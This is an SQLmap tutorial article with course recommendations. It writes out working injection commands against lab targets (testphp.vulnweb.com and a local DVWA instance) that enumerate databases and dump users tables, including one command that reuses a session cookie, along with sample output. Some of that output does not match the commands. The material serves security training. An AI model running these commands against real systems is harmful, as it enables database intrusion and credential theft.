Do you want to learn SQLmap? This article shares a collection of SQLmap tutorial and resources you should follow to master this tool.
SQL injection is one of the most critical and prevalent vulnerabilities existing in the enterprise security till date. SQLmap is a popular open source tool that helps penetration testers detect and exploit SQL injection flaws automatically. This Python-based tool helps testers taking over of database servers. Above all, if you are interested in learning this tool, you can learn it with the help of sqlmap tutorial and by joining a good course.
It features a powerful detection engine and features that enable ultimate penetration testing. You will find many switches like database fingerprinting, data fetching and executing commands on operating systems.
SQLmap can be used for the following:
- Scan web appsagainst SQL injection vulnerability
- Exploit SQL injection vulnerability
- Extract databases and database user detailentirely
- Bypass Web Application Firewall (WAF) by using tamper scripts
- Own the underlying operating system
Key Features of SQLmap Testing Tool
- Supports MySQL, Oracle, PostgreSQL, Microsoft Access, Microsoft SQL Server, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB DBMSs.
- Fully supports six SQL injection procedures: boolean-based blind, error-based, UNION query, time-based blind, stacked queries and out-of-band.
- Supports cracking password hash formats using a dictionary-based attack
- Allows enumeration of users, password hashes, privileges, roles, databases, tables and columns
So, if want to learn SQLmap, check the following quick SQLmap tutorials. Also, get familiar with the best resources to learn SQLmap as a beginner.
How to use SQLmap on windows?
Here is the simple and easy process to setup and install SQLmap on windows:
Step 1: First, Download and Install Python
SQLmaptool has been written in Python language. So, the first thing you require is the Python interpreter. Click python.org to download the Python interpreter.
SQLmap runs smoothly with both series of Python, 2.7.x and 3.3.x.
Step 2: Download and Install SQLmap
- Download the SQLmap zip file from sqlmap.org.
- Extract the downloadedSQLmap zip file in a desired directory.
- Open the DOS prompt and go to the SQLmapdirectory.
- Run the SQLmap.pycode with the Python interpreter.
SQLmap Tutorial PDF Resources
SQLmap Tutorial For Kali Linux
Boot into Kali Linux machine. Start a terminal and type
It will list the basic commands supported by SQLmap. Start with a simple command:
sqlmap -u <URL to inject>. In this tutorial, it will be-
Use –time-sec to speed up the process in case of slow server responses:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
It will show the Mysql version along with useful information about the database, like this:
SQLmap may ask some questions that have to be answered in yes or no. You have to type N for noand Y for yes.
Obtain the names of available databases by adding –dbs to the previous command:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs
Specify the desired database using –D and tell SQLmap to list the tables using –tables command. So, the final SQLmap command will be:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result would be-
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Specify the database using –D, table using – T and columns using –columns: sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns It will give you the result like this: Database: acuart Table: users
[8 columns] +----------------------------------+ | Column | Type | +----------------------------------+ | address | mediumtext | | name | varchar (100) | | pass | varchar (100) | | phone | varchar (100) | +----------------------------------+
As usual, use –D for database, -T for table, -C for column and –dump for data. The final command to fetch data will appear as shownbelow:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C phone,name,pass --dump
The output would be:
[15:41:00] [INFO] fetching columns ‘email, name, pass’ for table ‘users’ in database ‘acuart’ [15:41:01] [INFO] the SQL query used returns 4 entries [15:41:04] [INFO] retrieved: pass [15:41:08] [INFO] retrieved: varchar (100) [15:41:09] [INFO] retrieved: email [15:41:08] [INFO] retrieved: varchar (100) [15:41:10] [INFO] retrieved: name [15:41:14] [INFO] retrieved: varchar (100) [15:41:14] [INFO] fetching entries of column(s) ‘email, name, pass’ for table ‘users’ in database ‘acuart’ [15:41:14] [INFO] the SQL query used returns 1 entries [15:41:16] [INFO] retrieved: firstname.lastname@example.org [15:41:20] [INFO] retrieved: John Smith [15:41:22] [INFO] retrieved: test [15:41:22] [INFO] analyzing table dump for possible password hashes
Database: acuart Table: users [ 1 entry ] +-----------------------------------------------------+ | pass | name | email | | test | John Smith | email@example.com | +-----------------------------------------------------+
This tutorial explains how to use SQLmap for exploiting a vulnerable web application. To properly understand this tutorial, you need to have the knowledge of how database-based web apps work. In this tutorial, we will consider php+mysql.
Suppose, your web application has the following URL,and it is prone to SQL injection:
It is vulnerable to SQL injection because the developer didn’t properly escape the parameter ID. You can test it simply by trying to open the URL:
By adding symbol (‘) at the end of the URL string. If the URL responds with an error or reacts unexpectedly, it means the database has got the unexpected single quote which the web app failed to escape properly. In this case, the input parameter “id” is prone to SQL injection.
SQLmap Cheat Sheet
Check out the complete SQLmap cheat sheet here.
SQLmap Dump Table
To dump the data present in a table, use “-dump-all”. The command will look like:
--url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users -C user_id,user,password –dump
./sqlmap.py --url="http://192.168.152.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users -C user_id,user,password --dump –dump tells SQLMap to dump all the entries in the table. And, the –cookie session maintains access while attacking.
How to install SQLmap on ubuntu?
Step1: Download SQLmap in your machine using this command:
wget 'https://github.com/sqlmapproject/sqlmap/tarball/master' --output-document=sqlmap.tar.gz
It will download SQLmap on your machine from GitHub into your current directory.
Step 2: Use this command to extract your SQLmap package from tar file:
tar -xvf sqlmap.tar.gz
Step 3: Go to your SQLmap directory and run the following command:
cd sqlmapproject-sqlmap-c4f9e66/ Python sqlmap.py --version
It will test SQLmap in ubuntu.
Best Places To Learn SQLmap
The rapidly growing need for penetration testing and demand for SQL mapping, having the knowledge of this tool is even more important than ever before. With the constant looming threats, websites and databases are highly vulnerable to attacks. With advanced knowledge of SQL mapping, you can ensure the security of data within your organization. Learning SQL mapping has become a necessity today.
So, whether you want to secure your entrepreneur database or want to grab a job in the testing or hacking industry, the following list of learning resources certainly will help.
With Team Treehouse, you can learn SQLmap using On-demand videos and interactive code challenges. You will get job-ready skills and support from your fellow learners on this learning platform.
Team Treehouse brings affordable technology education to help people achieve their dream to pursue a career in the technology world. Your instructor will customize the plan as per your personal needs and schedule. You will learn at your own pace and become job ready at a fraction of the cost.
The website offers many courses for aspirants who want to learn SQLmap. Industry’s experienced and skillful professionals deliver all the courses.
Pluralsight is another great platform to learn and master SQLmap. Its expert-led SQL courses and tools will help you build advanced skills for using this penetration tool. Pluralsight is helpful for both business and personal use.
Beginners can enroll with Ethical Hacking: SQL Injection or Play by Play: Exploring the Internet of Vulnerabilities. Intermediate can enroll with Exploitation: Evading Detection and Bypassing Countermeasures or Security and Encryption in SQL Server 2012 and 2014 program.
- Extensive course library
- Course completion certificate
- Learning Paths
- Skill assessment
- Email and telephonic support
- Exercise files and much more.
Udemy is a renowned online learning platform with thousands of courses and millions of students. If you want to learn SQLmap with the help of interactive videos and expert lectures, choose Udemy. You can learn anytime and from anywhere as per your schedule and learning pace.
The top SQLmap courses available with Udemy would be:
These courses will tackle all your questions and doubts about ethical hacking and penetration testing. An experienced IT professional will tell you what Pentest is and how to become a successful Pentester. You will learn the Metasploit framework, ethical hacking methods, Kali Linux OS, Meterpreter, Arp poisoning attack and much more.
This course will teach you on Post Exploitation methods, hacking Linux and Windows and all methods of Network Pivoting.
- 3.4 Ratings
- 2, 149 students enrolled
- 5.5 hours on-demand REAL-LIFE Pentest scenario videos
- 27 downloadable resources
- Full-time access
- Certificate of completion
- Access on mobile and TV
This course will introduce you to various types of SQL injection vulnerabilities. You will learn advanced techniques for exploitation that will help you determine the impact of the vulnerability. You will also learn to differentiate a false positive and a real vulnerability.
You will learn all about SQL injection – what is it, types of SQL injection, potential vulnerabilities, etc. This course is ideal for those who want to become hackers,pentesters, developers and other information security professionals.
- 3.6 ratings
- 15,654 students enrolled
- 2.5 hours on-demand video
- Full-time access on mobile and TV
- Certificate of completion
This course will help you gain a deep understanding of virtual machines and Kali Linux. You will learn to perform excellent server testing and exploitation using SQLmap and a few more tools. This extensive course will also teach you to crack wireless network access points using various services.
You will learn to perform a full website and server vulnerability testing, search for back-doors and much more. You will also learn to perform a flawless reconnaissance with techniques including NSLookup, WhoIS, NetCraft, and theHarvester.
- 5.0 Ratings
- 56 students enrolled
- 4.5 hours on-demand video
- Full lifetime access
Among the all SQLmap learning resources, we recommend Team Treehouse platform. Treehouse is an affordable platform to learn SQLmap. It has a great community of fellow learners, supporters, teachers and industry experts. You get learning roadmaps and many course options to choose from.
We also recommend Udemy because it offers highly advanced SQLmap courses. You can get coupons for winning a great deal on the desired course. Its easy-to-follow video format makes learning interesting and easy.